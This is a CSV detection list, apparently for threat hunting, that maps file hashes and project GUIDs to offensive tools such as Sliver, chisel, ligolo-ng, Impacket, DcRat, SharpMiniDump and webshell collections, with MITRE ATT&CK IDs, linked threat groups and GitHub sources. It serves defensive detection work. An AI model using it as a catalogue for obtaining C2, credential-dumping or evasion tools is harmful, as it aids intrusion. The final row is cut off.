"*405e9c6f0b2ea355c45a80236dd541ecee957c73194dc3e7948b3ae02c8c70ea*",".{0,1000}405e9c6f0b2ea355c45a80236dd541ecee957c73194dc3e7948b3ae02c8c70ea.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth 
Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","25325" "*4070bbd80f416e04985826ef55eb76bef5aedfd6abf344ce25c5e7762e9d5ddc*",".{0,1000}4070bbd80f416e04985826ef55eb76bef5aedfd6abf344ce25c5e7762e9d5ddc.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25327" "*40779b8832f29dc3cf31a047d08e4da5aeaddfc8893b86b8f3f4e34bbb9cec1a*",".{0,1000}40779b8832f29dc3cf31a047d08e4da5aeaddfc8893b86b8f3f4e34bbb9cec1a.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25330" "*40834c0deedabba1254592d89b7b7a3af859f3d4e037226fc81eb771eb0a9406*",".{0,1000}40834c0deedabba1254592d89b7b7a3af859f3d4e037226fc81eb771eb0a9406.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25331" "*40853f24896e8e1ba7170a9775b056195567e6bbaeadb14afbb8312f35112583*",".{0,1000}40853f24896e8e1ba7170a9775b056195567e6bbaeadb14afbb8312f35112583.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - 
T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25333" "*408a69941c8239608571acf56048f603118e947c614c14f7679f19317d4c977b*",".{0,1000}408a69941c8239608571acf56048f603118e947c614c14f7679f19317d4c977b.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","25336" "*409284796af4c4aa27849cbd51e721620fe0eaa7e8482207905ac4d79bce680b*",".{0,1000}409284796af4c4aa27849cbd51e721620fe0eaa7e8482207905ac4d79bce680b.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","25338" "*409faf186d5c7ab9c289f8942614c716baed7107b57003f96d76f717bc197df4*",".{0,1000}409faf186d5c7ab9c289f8942614c716baed7107b57003f96d76f717bc197df4.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. 
solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","#filehash","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","25339" "*40a2c9d397f398d5faa631d6c6070174807e39962a22be143e35b7497b5c6bd7*",".{0,1000}40a2c9d397f398d5faa631d6c6070174807e39962a22be143e35b7497b5c6bd7.{0,1000}","offensive_tool_keyword","SharpMiniDump","Create a minidump of the LSASS process from memory","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/b4rtik/SharpMiniDump","1","0","#filehash","N/A","10","3","260","49","2022-11-02T15:47:30Z","2019-09-15T13:45:42Z","25340" "*40a7ea977e0b28240c6b53f0b5ee130050545aa06cce4ef21afb7f82645cd0cb*",".{0,1000}40a7ea977e0b28240c6b53f0b5ee130050545aa06cce4ef21afb7f82645cd0cb.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","25341" "*40ab3cf285a8ee70b183bd6f12c2b2fa0890df82ed38ce7833263781cbf37a19*",".{0,1000}40ab3cf285a8ee70b183bd6f12c2b2fa0890df82ed38ce7833263781cbf37a19.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#filehash","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","25342" "*40adc45972155c2b27e671de7a26d36e20c9061c9ace85c4939b3eadcb6f7467*",".{0,1000}40adc45972155c2b27e671de7a26d36e20c9061c9ace85c4939b3eadcb6f7467.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - 
T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25343" "*40af7b934df0673c434a4a92effc1928ad6294fc0ebc627718883645f0f42b58*",".{0,1000}40af7b934df0673c434a4a92effc1928ad6294fc0ebc627718883645f0f42b58.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25344" "*40B05F26-6A2F-40BC-88DE-F40D4BC77FB0*",".{0,1000}40B05F26\-6A2F\-40BC\-88DE\-F40D4BC77FB0.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","#GUIDproject","N/A","10","3","213","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z","25345" "*40b10d676e40a4c5c006f2d8b92cd5fa069b83348612d052e626e7792b4edbf7*",".{0,1000}40b10d676e40a4c5c006f2d8b92cd5fa069b83348612d052e626e7792b4edbf7.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","25347" "*40b6cb38fbdefd986159c294c15a9d85f477e8f4ff2c5b2beac4c7db5a9b4772*",".{0,1000}40b6cb38fbdefd986159c294c15a9d85f477e8f4ff2c5b2beac4c7db5a9b4772.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","#filehash","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","25348" "*40b8524cf1b5da1d34f75b27ab5c931cc576e8bd1bf78ea587e4b652d843ad89*",".{0,1000}40b8524cf1b5da1d34f75b27ab5c931cc576e8bd1bf78ea587e4b652d843ad89.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25349" "*40bb9963dfa7bef8169b8746bcb894cd53586c3d2f4316eb6cebb242f49be1ef*",".{0,1000}40bb9963dfa7bef8169b8746bcb894cd53586c3d2f4316eb6cebb242f49be1ef.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25351" 
"*40c04908fd5b240769a49825c02b50430948048234edf25d1b48905add12c275*",".{0,1000}40c04908fd5b240769a49825c02b50430948048234edf25d1b48905add12c275.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25352" "*40c48046580b66d7651f993380e92cf3e0931261134626e52e7be96132341e00*",".{0,1000}40c48046580b66d7651f993380e92cf3e0931261134626e52e7be96132341e00.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25354" "*40C64006-EE9C-4EC8-A378-B8499142C071*",".{0,1000}40C64006\-EE9C\-4EC8\-A378\-B8499142C071.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","25355" "*40C6A1BB-69AA-4869-81EE-41917D0B009A*",".{0,1000}40C6A1BB\-69AA\-4869\-81EE\-41917D0B009A.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","25356" "*40ce2ea4f4a90332a6e554ddbd9b801e22df018458127ae6ad1243c7d25a5523*",".{0,1000}40ce2ea4f4a90332a6e554ddbd9b801e22df018458127ae6ad1243c7d25a5523.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command 
and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#filehash","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","25358" "*40ce2ea4f4a90332a6e554ddbd9b801e22df018458127ae6ad1243c7d25a5523*",".{0,1000}40ce2ea4f4a90332a6e554ddbd9b801e22df018458127ae6ad1243c7d25a5523.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","25359" "*40ce820df679b59476f5d277350dca43e3b3f8cac7ec47ad638371aaa646c315*",".{0,1000}40ce820df679b59476f5d277350dca43e3b3f8cac7ec47ad638371aaa646c315.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). 
It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","25360" "*40d3e3372bd58101f50a25902a71a41fd1605652fe051b3e90660563a9fbebd3*",".{0,1000}40d3e3372bd58101f50a25902a71a41fd1605652fe051b3e90660563a9fbebd3.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25362" "*40d86b833531b7f216caa95443f4eb6f0e5b15764072a5708d62380bac2f8ff4*",".{0,1000}40d86b833531b7f216caa95443f4eb6f0e5b15764072a5708d62380bac2f8ff4.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","25364" "*40e4a1e4db51c8aecc7f13b8b3329707d0e353607b83e86e776bd4bfc480516e*",".{0,1000}40e4a1e4db51c8aecc7f13b8b3329707d0e353607b83e86e776bd4bfc480516e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25368" "*40E7714F-460D-4CA6-9A5A-FB32C6769BE4*",".{0,1000}40E7714F\-460D\-4CA6\-9A5A\-FB32C6769BE4.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the 
Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","#GUIDproject","N/A","10","2","102","13","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z","25369" "*40e7b75207030fb9603977b5b4fb3a8e67f73a243f004cc6eac07114f2ae061a*",".{0,1000}40e7b75207030fb9603977b5b4fb3a8e67f73a243f004cc6eac07114f2ae061a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25370" "*40e7cf7955a9a2beedf5d284529036b04c65650f81e81776d8c63713e86b9ca2*",".{0,1000}40e7cf7955a9a2beedf5d284529036b04c65650f81e81776d8c63713e86b9ca2.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","25371" "*40e8b756d0f996d7127ffc76d3fb122dd014455bc6b0c007e6d5d77e5bb6211b*",".{0,1000}40e8b756d0f996d7127ffc76d3fb122dd014455bc6b0c007e6d5d77e5bb6211b.{0,1000}","offensive_tool_keyword","clickjack","automate abuse of clickonce applications","T1210 - T1204 - T1071.001","TA0001 - TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","25372" "*40ed4b2a45d5609b78ee36ff6779e51e932bfc50363ca6ec7c4f598d44407bdc*",".{0,1000}40ed4b2a45d5609b78ee36ff6779e51e932bfc50363ca6ec7c4f598d44407bdc.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25374" "*40f072d74c6fa0c3e9974ca3e7ab5fdafa63487c4ace88c0ec7f539d7b79bfec*",".{0,1000}40f072d74c6fa0c3e9974ca3e7ab5fdafa63487c4ace88c0ec7f539d7b79bfec.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25375" "*40f237f59a3908d8ba89cdef811ea08cda8cfde555335efc5aa595bbbbaa2463*",".{0,1000}40f237f59a3908d8ba89cdef811ea08cda8cfde555335efc5aa595bbbbaa2463.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25376" "*40fc9bd6c327b0384488f7935bc7ce65c84b9d5076561605b7743be82840f3b5*",".{0,1000}40fc9bd6c327b0384488f7935bc7ce65c84b9d5076561605b7743be82840f3b5.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - 
LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25378" "*4104657745ea61b6e8ea8e468968e96bb5b266abedd73d93324ce14113edcdd9*",".{0,1000}4104657745ea61b6e8ea8e468968e96bb5b266abedd73d93324ce14113edcdd9.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","25380" "*410973764272a0d7b03d129471da1fb720dfdc2c9c0b0934b390bb58444b9c50*",".{0,1000}410973764272a0d7b03d129471da1fb720dfdc2c9c0b0934b390bb58444b9c50.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25382" "*4109aabda29898f764177befbe6967500dd724e511317a8232a046c91502b38f*",".{0,1000}4109aabda29898f764177befbe6967500dd724e511317a8232a046c91502b38f.{0,1000}","offensive_tool_keyword","Ddexec","A technique to run binaries filelessly and stealthily on Linux by ""overwriting"" the shell's process with another.","T1055.008 - T1106 - T1059.004","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/arget13/DDexec","1","0","#filehash #linux","N/A","9","9","830","88","2025-03-21T17:51:04Z","2022-01-27T12:52:10Z","25383" 
"*410D25CC-A75E-4B65-8D24-05FA4D8AE0B9*",".{0,1000}410D25CC\-A75E\-4B65\-8D24\-05FA4D8AE0B9.{0,1000}","offensive_tool_keyword","PrivFu","Tool to execute token assigned process","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","TokenAssignor","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","25384" "*411305d5a0aac7535dc0b676e880c689f254f270f402ec98e395a322996f75da*",".{0,1000}411305d5a0aac7535dc0b676e880c689f254f270f402ec98e395a322996f75da.{0,1000}","offensive_tool_keyword","mortar","evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR)","T1027 - T1562","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","#filehash","N/A","8","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","25386" "*41150be536a30cd95e14bffabff19ac925a283b03425f69cdb0609e428b2ef3a*",".{0,1000}41150be536a30cd95e14bffabff19ac925a283b03425f69cdb0609e428b2ef3a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25387" "*41200aacf9f458f0c7dc10d200937ef343a8625d249557f4132605ccb6dc0fc5*",".{0,1000}41200aacf9f458f0c7dc10d200937ef343a8625d249557f4132605ccb6dc0fc5.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25392" "*4125d5d3a70366096d13f69bbc1c54ec0bde74411783246365759cb2e727a8ff*",".{0,1000}4125d5d3a70366096d13f69bbc1c54ec0bde74411783246365759cb2e727a8ff.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","25393" "*413be3fa27650bb8202b36a93755e57a56faf88d98f38a8c546ac6117c70575e*",".{0,1000}413be3fa27650bb8202b36a93755e57a56faf88d98f38a8c546ac6117c70575e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25394" "*41414141-4141-4141-4141-414141414141*",".{0,1000}41414141\-4141\-4141\-4141\-414141414141.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","default SMB challenge https://pbs.twimg.com/media/GHcBPL8a4AA18Jl?format=jpg","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","25395" "*4142dd9b827ddda740d7810e94f28d65a9aedeba637b8e3d785dba1947ccad52*",".{0,1000}4142dd9b827ddda740d7810e94f28d65a9aedeba637b8e3d785dba1947ccad52.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","25396" "*4146c24d1d9cfa4c6c019fe4a0bd22f7b5d18086b18b7a74a0965e16e7f94bef*",".{0,1000}4146c24d1d9cfa4c6c019fe4a0bd22f7b5d18086b18b7a74a0965e16e7f94bef.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","25398" "*4153cb9a9c23f7a72a60f0eaf0a615fe95abe975886f65e80afea2be15aea242*",".{0,1000}4153cb9a9c23f7a72a60f0eaf0a615fe95abe975886f65e80afea2be15aea242.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25399" "*4156a612622946b1daab4b43c632edf80477c45f2bbf55f474ffc33c1cd077f2*",".{0,1000}4156a612622946b1daab4b43c632edf80477c45f2bbf55f474ffc33c1cd077f2.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","#filehash","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","25400" "*415f579b9741f7936312e0320e2da763f7cd9f29903605f3bf1cfa6f28f791f6*",".{0,1000}415f579b9741f7936312e0320e2da763f7cd9f29903605f3bf1cfa6f28f791f6.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - 
